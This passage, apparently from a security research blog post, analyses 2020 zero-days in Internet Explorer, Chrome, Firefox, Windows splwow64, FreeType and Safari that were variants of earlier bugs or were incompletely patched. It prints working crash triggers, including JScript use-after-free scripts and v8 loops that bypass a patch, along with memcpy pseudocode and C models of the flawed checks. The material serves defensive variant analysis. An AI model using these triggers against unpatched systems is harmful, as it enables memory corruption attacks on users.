Call sort with a custom callback\n\n- [1,2].sort(F); \n \n--- \n \n### CVE-2020-0674\n\nIn January 2020, [CVE-2020-0674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0674>) was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only change required to the trigger for CVE-2019-1367 is to replace the references to arguments[] with one of the arguments named in the function definition. For example, we replaced every instance of arguments[0] with arg1.\n\nvar spray = new Array();\n\n+ function F(arg1, arg2) {\n\n- function F() {\n\n// 2. Create a bunch of objects\n\nfor (var i = 0; i < 20000; i++) spray[i] = new Object();\n\n// 3. Store a reference to one of them in one of the named arguments\n\n// The named arguments aren't tracked by garbage collector\n\n+ arg1 = spray[5000];\n\n- arguments[0] = spray[5000];\n\n// 4. Delete the objects and call the garbage collector\n\n// All JScript variables get reclaimed... \n\nfor (var i = 0; i < 20000; i++) spray[i] = 1;\n\nCollectGarbage();\n\n// 5. But we still have reference to one of them in\n\n// a named argument\n\n+ alert(arg1);\n\n- alert(arguments[0]);\n\n}\n\n// 1. Call sort with a custom callback\n\n[1,2].sort(F); \n \n--- \n \n### CVE-2020-0968\n\nUnfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>), another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the [advisory](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>)). 
\n\nvar spray = new Array();\n\nfunction f1() {\n\nalert('callback 1');\n\nreturn spray[6000];\n\n}\n\nfunction f2() {\n\nalert('callback 2');\n\nspray = null;\n\nCollectGarbage();\n\nreturn 'a'\n\n}\n\nfunction boom() {\n\nvar e = o1;\n\nvar d = o2;\n\n// 3. the first callback (e.toString) happens\n\n// it returns one of the string variables\n\n// which is stored in a temporary variable\n\n// on the stack, not tracked by garbage collector\n\n// 4. Second callback (d.toString) happens\n\n// There, string variables get freed\n\n// and the space reclaimed\n\n// 5. Crash happens when attempting to access\n\n// string content of the temporary variable\n\nvar b = e + d;\n\nalert(b);\n\n}\n\n// 1. create two objects with toString callbacks\n\nvar o1 = { toString: f1 };\n\nvar o2 = { toString: f2 };\n\n// 2. create a bunch of string variables\n\nfor (var a = 0; a < 20000; a++) {\n\nspray[a] = \"aaa\";\n\n}\n\nboom(); \n \n--- \n \nIn addition to the vulnerabilities themselves being very similar, the attacker used the same exploit method for each of the four 0-day exploits. This provided a type of \u201cplug and play\u201d quality to their 0-day development which would have reduced the amount of work required for each new 0-day exploit. \n\n## Firefox CVE-2020-6820\n\nMozilla patched [CVE-2020-6820 in Firefox with an out-of-band security update](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/>) in April 2020. It is a use-after-free in the Cache subsystem. \n\nCVE-2020-6820 is a use-after-free of the CacheStreamControlParent when closing its last open read stream. The read stream is the response returned to the context process from a cache query. If the close or abort command is received while any read streams are still open, it triggers StreamList::CloseAll. 
If the StreamControl (this must be the Parent, which lives in the browser process, to get a use-after-free in the browser process; the Child would only give one in the renderer) still has ReadStreams when StreamList::CloseAll is called, the CacheStreamControlParent is freed. Its mId member is then accessed, causing the use-after-free.\n\nThe execution path for CVE-2020-6820 is:\n\nStreamList::CloseAll \u2190 Patched function\n\nCacheStreamControlParent::CloseAll\n\nCacheStreamControlParent::NotifyCloseAll\n\nStreamControl::CloseAllReadStreams\n\nFor each stream:\n\nReadStream::Inner::CloseStream\n\nReadStream::Inner::Close\n\nReadStream::Inner::NoteClosed\n\n\u2026\n\nStreamControl::NoteClosed\n\nStreamControl::ForgetReadStream\n\nCacheStreamControlParent/Child::NoteClosedAfterForget\n\nCacheStreamControlParent::RecvNoteClosed\n\nStreamList::NoteClosed\n\nIf StreamList is empty && mStreamControl:\n\nCacheStreamControlParent::Shutdown\n\nSend__delete(this) \u2190 FREED HERE!\n\nPCacheStreamControlParent::SendCloseAll \u2190 Used here in call to Id() \n \n--- \n \nCVE-2020-6820 is a variant of an internally found Mozilla vulnerability, [Bug 1507180](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180>). Bug 1507180 was discovered in November 2018 and [patched in December 2019](<https://hg.mozilla.org/mozilla-central/rev/cdf525897bff>). It is a use-after-free of the ReadStream in mReadStreamList in StreamList::CloseAll. While it was patched in December, [an explanatory comment](<https://hg.mozilla.org/mozilla-central/rev/25beb671c14a>) on why the December 2019 patch was needed was only added in early March 2020. 
\n\nFor Bug 1507180 the execution path was the same as for CVE-2020-6820, except that the use-after-free occurred earlier, in StreamControl::CloseAllReadStreams rather than a few calls \u201chigher\u201d in StreamList::CloseAll.\n\nIn my personal opinion, I have doubts about whether or not this vulnerability was actually exploited in-the-wild. As far as we know, no one (including myself or Mozilla engineers [[1](<https://bugzilla.mozilla.org/show_bug.cgi?id=1626728#c15>), [2](<https://bugzilla.mozilla.org/show_bug.cgi?id=1507180#c10>)]) has found a way to trigger this exploit without shutting down the process. Therefore, exploiting this vulnerability doesn\u2019t seem very practical. However, because it was marked as exploited in-the-wild in the advisory, it remains in our [in-the-wild tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>) and thus included in this list.\n\n## Chrome for Android CVE-2020-6572\n\n[CVE-2020-6572](<https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html>) is a use-after-free in MediaCodecAudioDecoder::~MediaCodecAudioDecoder(). This is Android-specific code that uses Android's media decoding APIs to support playback of DRM-protected media on Android. The root of this use-after-free is that one `unique_ptr` is assigned to another, so the object it previously owned goes out of scope and can be deleted, while a raw pointer into that object is not updated. \n\nMore specifically, MediaCodecAudioDecoder::Initialize doesn't reset media_crypto_context_ if media_crypto_ has been previously set. This can occur if MediaCodecAudioDecoder::Initialize is called twice, which is explicitly supported. This is problematic when the second initialization uses a different CDM than the first one. Each CDM owns the media_crypto_context_ object, and the CDM itself (cdm_context_ref_) is a `unique_ptr`. 
Once the new CDM is set, the old CDM loses a reference and may be destructed. However, MediaCodecAudioDecoder still holds a raw pointer to media_crypto_context_ from the old CDM since it wasn't updated, which results in the use-after-free on media_crypto_context_ (for example, in MediaCodecAudioDecoder::~MediaCodecAudioDecoder). \n\nThis vulnerability that was exploited in-the-wild was reported in April 2020. 7 months prior, in September 2019, Man Yue Mo of Semmle [reported a very similar vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730>), [CVE-2019-13695](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop.html>). CVE-2019-13695 is also a use-after-free on a dangling media_crypto_context_ in MojoAudioDecoderService after releasing the cdm_context_ref_. This vulnerability is essentially the same bug as CVE-2020-6572, it\u2019s just triggered by an error path after initializing MojoAudioDecoderService twice rather than by reinitializing the MediaCodecAudioDecoder.\n\nIn addition, in August 2019, Guang Gong of Alpha Team, Qihoo 360 reported another similar vulnerability in the same component. The [vulnerability](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311>) is where the CDM could be registered twice (e.g. MojoCdmService::Initialize could be called twice) leading to use-after-free. When MojoCdmService::Initialize was called twice there would be two map entries in cdm_services_, but only one would be removed upon destruction, and the other was left dangling. This vulnerability is [CVE-2019-5870](<https://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html>). Guang Gong used this vulnerability as a part of an Android exploit chain. 
He presented on this exploit chain at Blackhat USA 2020, \u201c[TiYunZong: An Exploit Chain to Remotely Root Modern Android Devices](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>)\u201d. \n\nWhile one could argue that the vulnerability from Guang Gong is not a variant of the vulnerability exploited in-the-wild, it was at the very least an early indicator that the Mojo CDM code for Android had life-cycle issues and needed a closer look. This [was noted in the issue tracker ](<https://bugs.chromium.org/p/chromium/issues/detail?id=999311#c8>)for CVE-2019-5870 and then [brought up again](<https://bugs.chromium.org/p/chromium/issues/detail?id=1004730#c1>) after Man Yue Mo reported CVE-2019-13695.\n\n## Windows splwow64 CVE-2020-0986\n\n[CVE-2020-0986](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) is an arbitrary pointer dereference in Windows splwow64. Splwow64 is executed any time a 32-bit application wants to print a document. It runs as a Medium integrity process. Internet Explorer runs as a 32-bit application and a Low integrity process. Internet Explorer can send LPC messages to splwow64. CVE-2020-0986 allows an attacker in the Internet Explorer process to control all three arguments to a memcpy call in the more privileged splwow64 address space. The only difference between CVE-2020-0986 and [CVE-2019-0880](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0880>), which was also exploited in-the-wild, is that CVE-2019-0880 exploited the memcpy by sending message type 0x75 and CVE-2020-0986 exploits it by sending message type 0x6D. 
\n\nFrom this [great write-up from ByteRaptors](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>) on CVE-2019-0880, the pseudocode for the attacker-controlled memcpy is:\n\nvoid GdiPrinterThunk(LPVOID firstAddress, LPVOID secondAddress, LPVOID thirdAddress)\n\n{\n\n...\n\nif(*((BYTE*)(firstAddress + 0x4)) == 0x75){\n\nULONG64 memcpyDestinationAddress = *((ULONG64*)(firstAddress + 0x20));\n\nif(memcpyDestinationAddress != NULL){\n\nULONG64 sourceAddress = *((ULONG64*)(firstAddress + 0x18));\n\nDWORD copySize = *((DWORD*)(firstAddress + 0x28));\n\nmemcpy(memcpyDestinationAddress,sourceAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nThe equivalent pseudocode for CVE-2020-0986 is below. Only the message type (0x75 to 0x6D) and the offsets of the controlled memcpy arguments changed, as shown below.\n\nvoid GdiPrinterThunk(LPVOID msgSend, LPVOID msgReply, LPVOID arg3)\n\n{\n\n...\n\nif(*((BYTE*)(msgSend + 0x4)) == 0x6D){\n\n...\n\nULONG64 srcAddress = **((ULONG64 **)(msgSend + 0xA));\n\nif(srcAddress != NULL){\n\nDWORD copySize = *((DWORD*)(msgSend + 0x40));\n\nif(copySize <= 0x1FFFE) {\n\nULONG64 destAddress = *((ULONG64*)(msgSend + 0xB));\n\nmemcpy(destAddress,srcAddress,copySize);\n\n}\n\n}\n\n...\n\n} \n \n--- \n \nIn addition to CVE-2020-0986 being a trivial variant of a previous in-the-wild vulnerability, it was also not patched completely: the vulnerability was still exploitable even after the patch was applied. This is detailed in the \u201cExploited 0-days not properly fixed\u201d section below.\n\n## Freetype CVE-2020-15999\n\nIn October 2020, Project Zero discovered multiple exploit chains being used in the wild. The exploit chains targeted iPhone, Android, and Windows users, but they all shared the same Freetype RCE to exploit the Chrome renderer, [CVE-2020-15999](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>). 
[The vulnerability is a heap buffer overflow](<https://savannah.nongnu.org/bugs/?59308>) in the Load_SBit_Png function. The vulnerability was being triggered by an integer truncation. `Load_SBit_Png` processes PNG images embedded in fonts. The image width and height are stored in the PNG header as 32-bit integers. Freetype then truncated them to 16-bit integers. This truncated value was used to calculate the bitmap size and the backing buffer is allocated to that size. However, the original 32-bit width and height values of the bitmap are used when reading the bitmap into its backing buffer, thus causing the buffer overflow.\n\nIn November 2014, Project Zero team member [Mateusz Jurczyk reported CVE-2014-9665](<https://bugs.chromium.org/p/project-zero/issues/detail?id=168>) to Freetype. CVE-2014-9665 is also a heap buffer overflow in the Load_SBit_Png function. This one was triggered differently though. In CVE-2014-9665, when calculating the bitmap size, the size variable is vulnerable to an integer overflow causing the backing buffer to be too small. 
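To make the two failure modes concrete, here is a small C model (an added example, not FreeType's code) of the size computation in `Load_SBit_Png` in three revisions: before 2014, after the CVE-2014-9665 fix, and after the CVE-2020-15999 fix, both of which are quoted below. The struct, the function names and the use of `uint32_t` to stand in for the 32-bit `rows * pitch` product are the model's own assumptions; the 16-bit `metrics` fields follow the truncation described above. With a 0x8000 by 0x8000 image the unchecked product wraps to zero; with a width of 0x10010 the 2014 check, which runs after the 16-bit assignment, sees 0x10 and lets a 64-byte bitmap through for 262,208 bytes of pixel data, while the 2020 check rejects the header value before it is truncated.

```c
/*
 * Model of the Load_SBit_Png size computation in three revisions of
 * FreeType's pngshim.c: before the 2014 fix, after the CVE-2014-9665 fix
 * (bounds check placed after the 16-bit assignment) and after the
 * CVE-2020-15999 fix (bounds check on the 32-bit PNG header values).
 * Added illustration, not FreeType code: the struct, the function names
 * and uint32_t standing in for the 32-bit rows * pitch product are assumptions.
 */
#include <stdint.h>
#include <stdio.h>

#define MAX_DIM 0x7FFFu   /* "reject too large bitmaps similarly to the rasterizer" */

typedef enum { FIX_NONE = 0, FIX_2014 = 1, FIX_2020 = 2 } fix_level;

typedef struct {
    uint16_t metric_width;   /* TT_SBit_Metrics.width is FT_UShort: assignment truncates */
    uint16_t metric_height;  /* TT_SBit_Metrics.height, likewise */
    uint32_t map_pitch;      /* map->pitch = map->width * 4 (BGRA) */
    uint32_t alloc_size;     /* size handed to ft_glyphslot_alloc_bitmap */
    uint64_t needed_size;    /* bytes the PNG decoder writes: imgHeight rows of imgWidth * 4 */
    int      rejected;       /* 1 if this revision threw Array_Too_Large */
} sbit_model;

/* imgWidth / imgHeight are the 32-bit values read from the PNG IHDR chunk. */
sbit_model load_sbit_png_model(uint32_t imgWidth, uint32_t imgHeight, fix_level fix)
{
    sbit_model m = {0};

    /* CVE-2020-15999 fix: test the header values before anything is truncated. */
    if (fix == FIX_2020 && (imgWidth > MAX_DIM || imgHeight > MAX_DIM)) {
        m.rejected = 1;
        return m;
    }

    m.metric_width  = (uint16_t)imgWidth;    /* silent truncation to 16 bits */
    m.metric_height = (uint16_t)imgHeight;
    m.map_pitch     = (uint32_t)m.metric_width * 4;

    /* CVE-2014-9665 fix: same limit, but applied to the already-truncated values. */
    if (fix == FIX_2014 && (m.metric_height > MAX_DIM || m.metric_width > MAX_DIM)) {
        m.rejected = 1;
        return m;
    }

    /* size = map->rows * map->pitch in 32-bit arithmetic: wraps for large inputs (2014 bug). */
    m.alloc_size  = (uint32_t)m.metric_height * m.map_pitch;
    /* What actually gets written, computed from the untruncated header values. */
    m.needed_size = (uint64_t)imgWidth * imgHeight * 4;
    return m;
}

/* Heap overflow iff the image was accepted and decodes into a smaller buffer. */
int overflows(sbit_model m)
{
    return !m.rejected && m.needed_size > m.alloc_size;
}

int main(void)
{
    /* Constructed inputs: one per bug, plus an ordinary embedded bitmap. */
    struct { uint32_t w, h; const char *what; } cases[] = {
        { 0x8000u,  0x8000u, "CVE-2014-9665: rows * pitch wraps to 0" },
        { 0x10010u, 1u,      "CVE-2020-15999: width truncates to 0x10" },
        { 100u,     50u,     "ordinary embedded bitmap" },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        for (int f = FIX_NONE; f <= FIX_2020; f++) {
            sbit_model m = load_sbit_png_model(cases[i].w, cases[i].h, (fix_level)f);
            printf("%-40s fix=%d rejected=%d alloc=%u needed=%llu overflow=%d\n",
                   cases[i].what, f, m.rejected, (unsigned)m.alloc_size,
                   (unsigned long long)m.needed_size, overflows(m));
        }
    }
    return 0;
}
```

The model does not decode PNGs; `needed_size` is simply the byte count of an 8-bit BGRA image of the header dimensions, which matches the `pitch = width * 4` layout in the quoted code. The point it makes is the ordering one: the same `0x7FFF` limit is safe or useless depending on whether it is applied before or after the narrowing assignment.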
\n\nTo patch CVE-2014-9665, [Freetype added a check to the rows and width](<http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/sfnt/pngshim.c?id=54abd22891bd51ef8b533b24df53b3019b5cee81>) prior to calculating the size, as shown below. Note that the check runs after imgWidth and imgHeight have already been assigned to the 16-bit metrics fields, so it tests the truncated values.\n\nif ( populate_map_and_metrics )\n\n{\n\nFT_Long size;\n\nmetrics->width = (FT_Int)imgWidth;\n\nmetrics->height = (FT_Int)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\nsize = map->rows * map->pitch; <- overflow size\n\nerror = ft_glyphslot_alloc_bitmap( slot, size );\n\nif ( error )\n\ngoto DestroyExit;\n\n} \n \n--- \n \nTo patch CVE-2020-15999, the vulnerability exploited in the wild in 2020, this check was moved up earlier in the `Load_SBit_Png` function and changed to test `imgWidth` and `imgHeight`, the width and height values from the PNG header, before they are assigned. \n\nif ( populate_map_and_metrics )\n\n{\n\n+ /* reject too large bitmaps similarly to the rasterizer */\n\n+ if ( imgWidth > 0x7FFF || imgHeight > 0x7FFF )\n\n+ {\n\n+ error = FT_THROW( Array_Too_Large );\n\n+ goto DestroyExit;\n\n+ }\n\n+\n\nmetrics->width = (FT_UShort)imgWidth;\n\nmetrics->height = (FT_UShort)imgHeight;\n\nmap->width = metrics->width;\n\nmap->rows = metrics->height;\n\nmap->pixel_mode = FT_PIXEL_MODE_BGRA;\n\nmap->pitch = map->width * 4;\n\nmap->num_grays = 256;\n\n- /* reject too large bitmaps similarly to the rasterizer */\n\n- if ( map->rows > 0x7FFF || map->width > 0x7FFF )\n\n- {\n\n- error = FT_THROW( Array_Too_Large );\n\n- goto DestroyExit;\n\n- }\n\n[...] 
To summarize:

 * CVE-2014-9665 caused a buffer overflow by overflowing the size field in the `size = map->rows * map->pitch;` calculation.
 * CVE-2020-15999 caused a buffer overflow by truncating `metrics->width` and `metrics->height`, which are then used to calculate the size field, thus causing the size field to be too small.

A fix for the root cause of the buffer overflow in November 2014 would have been to bounds check `imgWidth` and `imgHeight` prior to any assignments to an unsigned short. Including the bounds check of the height and width from the PNG header early would have prevented both manners of triggering this buffer overflow.

## Apple Safari CVE-2020-27930

This vulnerability is slightly different from the rest in that, while it’s still a variant, it’s not clear that by current disclosure norms one would have necessarily expected Apple to have picked up the patch. Apple and Microsoft both forked the Adobe Type Manager code over 20 years ago. Due to the forks, there’s no true “upstream”. However, when vulnerabilities were reported in Microsoft’s, Apple’s, or Adobe’s fork, there is a possibility (though no guarantee) that it was also in the others.

The CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The [variant, CVE-2015-0993, was reported](<http://bugs.chromium.org/p/project-zero/issues/detail?id=180>) to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly the case when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack.

[CVE-2020-27930](<https://support.apple.com/en-us/HT211929>), the vulnerability exploited in-the-wild in 2020, is very similar.
The vulnerability this time is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write.

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.

# Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.

| Product | Vulnerability that was exploited in-the-wild | 2nd patch |
|---|---|---|
| Internet Explorer | CVE-2020-0674 | CVE-2020-0968 |
| Google Chrome | CVE-2019-13764* | CVE-2020-6383 |
| Microsoft Windows | CVE-2020-0986 | CVE-2020-17008/CVE-2021-1648 |

\* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

## Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, its patch still didn’t comprehensively fix all of the variants. Microsoft patched [CVE-2020-0968](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-0968>) in April 2020.
We show the trigger in the section above.

## Google Chrome CVE-2019-13764

[CVE-2019-13764](<https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html>) in Chrome is an interesting case. When it was [patched in November 2019](<https://chromium.googlesource.com/v8/v8/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>), it was not known to be exploited in-the-wild. Instead, [it was reported by security researchers Soyeon Park and Wen Xu](<https://bugs.chromium.org/p/chromium/issues/detail?id=1028863>). Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “[Chrome Infinity Bug](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>)”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 JavaScript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect of v8’s integer type is that it is not closed under addition, meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13764.
Note that this line will not show any observable crash effects, and the road to making this vulnerability exploitable is quite long; check out [this blog post](<https://googleprojectzero.blogspot.com/>) if you’re interested!

```javascript
for (var i = -Infinity; i < 0; i += Infinity) { }
```

[The patch](<https://chromium.googlesource.com/v8/v8.git/+/b8b6075021ade0969c6b8de9459cd34163f7dbe1>) that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

```javascript
var increment = -Infinity;
var k = 0;
// The initial loop value is 0 and the increment is -Infinity.
// This is permissible because 0 + -Infinity = -Infinity, an integer.
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    // Once the initial variable equals -Infinity (one loop through)
    // the increment is changed to +Infinity. -Infinity + +Infinity = NaN
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}
```

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. [This incomplete fix was reported](<https://bugs.chromium.org/p/chromium/issues/detail?id=1051017>) to Chrome in February 2020. [This patch](<https://chromium.googlesource.com/v8/v8.git/+/a2e971c56d1c46f7c71ccaf33057057308cc8484>) was more conservative: it bailed as soon as it detected that the increment can be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”.
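As an added example (constructed here; not v8's code and not from Sergei's post), a C model of the induction-variable typing discussed above, covering both the original trigger and the changing-increment trigger: it infers whether the loop variable is "integer" the way each version of the typer did, then runs the loop concretely to see whether that inference actually held. The function names and the `increments` list (every value the loop body can assign to the increment) are assumptions of the model.

```c
/* Constructed model (not v8 code) of the induction-variable typing behind
 * CVE-2019-13764. v8's integer type admits +Infinity and -Infinity but not NaN
 * or -0, and is not closed under addition: -Infinity + +Infinity = NaN. Each
 * typer version below infers a type; a concrete loop run then checks whether
 * the induction variable really stayed inside that type. */
#include <math.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

enum typer_version {
    TYPER_ORIGINAL,      /* pre-patch: integer init + integer increment => integer */
    TYPER_FIRST_PATCH,   /* Nov 2019: also reject when init + increment is NaN */
    TYPER_SECOND_PATCH   /* Feb 2020: bail whenever the increment can be +/-Infinity */
};

/* Whole-number test without libm's floor(): every double of magnitude >= 2^53 is whole. */
static bool is_whole(double x)
{
    if (x >= 9007199254740992.0 || x <= -9007199254740992.0) return true;
    return (double)(long long)x == x;
}

/* v8's integer type as the post describes it. */
bool is_v8_integer(double x)
{
    if (isnan(x)) return false;
    if (x == 0.0 && signbit(x)) return false;   /* -0 is excluded */
    return isinf(x) || is_whole(x);
}

/* `increments` holds every value the loop body can assign to the increment;
 * increments[0] is the one paired with `init` in the for-statement. */
bool typer_says_integer(double init, const double *increments, size_t n, enum typer_version v)
{
    if (!is_v8_integer(init)) return false;
    for (size_t i = 0; i < n; i++)
        if (!is_v8_integer(increments[i])) return false;
    if (v == TYPER_FIRST_PATCH && isnan(init + increments[0]))
        return false;   /* NaN check, but only against the initial increment */
    if (v == TYPER_SECOND_PATCH)
        for (size_t i = 0; i < n; i++)
            if (isinf(increments[i])) return false;
    return true;
}

/* Runs `for (i = init; i < bound; i += inc)` concretely; iteration k uses
 * increments[k] (the last entry thereafter), modelling a body that changes the
 * increment. Returns false if the induction variable ever leaves the integer type. */
bool loop_stays_integer(double init, double bound, const double *increments, size_t n, int max_iter)
{
    double i = init;
    for (int k = 0; k < max_iter && i < bound; k++) {
        size_t idx = (size_t)k < n ? (size_t)k : n - 1;
        i += increments[idx];
        if (!is_v8_integer(i)) return false;
    }
    return true;
}

/* Type confusion: the typer claims "integer" but execution produced NaN. */
bool type_confusion(double init, double bound, const double *inc, size_t n, enum typer_version v)
{
    return typer_says_integer(init, inc, n, v) && !loop_stays_integer(init, bound, inc, n, 10);
}

/* The original trigger: for (var i = -Infinity; i < 0; i += Infinity) { } */
bool original_trigger_confused(enum typer_version v)
{
    const double inc[] = { INFINITY };
    return type_confusion(-INFINITY, 0.0, inc, 1, v);
}

/* The post-patch trigger: i starts at 0 with increment -Infinity, then the
 * body switches the increment to +Infinity once i == -Infinity. */
bool changing_increment_trigger_confused(enum typer_version v)
{
    const double inc[] = { -INFINITY, INFINITY };
    return type_confusion(0.0, 1.0, inc, 2, v);
}

/* An ordinary counting loop, for contrast. */
bool counting_loop_confused(enum typer_version v)
{
    const double inc[] = { 1.0 };
    return type_confusion(0.0, 3.0, inc, 1, v);
}

int main(void)
{
    const char *names[] = { "original", "first patch", "second patch" };
    for (int v = TYPER_ORIGINAL; v <= TYPER_SECOND_PATCH; v++)
        printf("%-12s  trigger1=%d  trigger2=%d  counting=%d\n", names[v],
               (int)original_trigger_confused((enum typer_version)v),
               (int)changing_increment_trigger_confused((enum typer_version)v),
               (int)counting_loop_confused((enum typer_version)v));
    return 0;
}
```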
Again, check out [Sergei’s blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>) if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just for vulnerabilities known to be exploited in-the-wild. The security industry [knows there is a detection gap](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>) in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days, and we certainly don’t find them all in a timely manner.

## Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After [Kaspersky reported that CVE-2020-0986 was actively exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only [disclosed as exploited in-the-wild in August 2020](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>).

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message with offsets. This didn’t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. [This issue was reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later.
This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.

# Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension.
While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis on other vulnerabilities as well. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: [my talk at BluehatIL 2020](<https://www.youtube.com/watch?v=mC1Pwsdy814>) and [Ki Chan Ahn at OffensiveCon 2020](<https://www.youtube.com/watch?v=fTNzylTMYks>).)

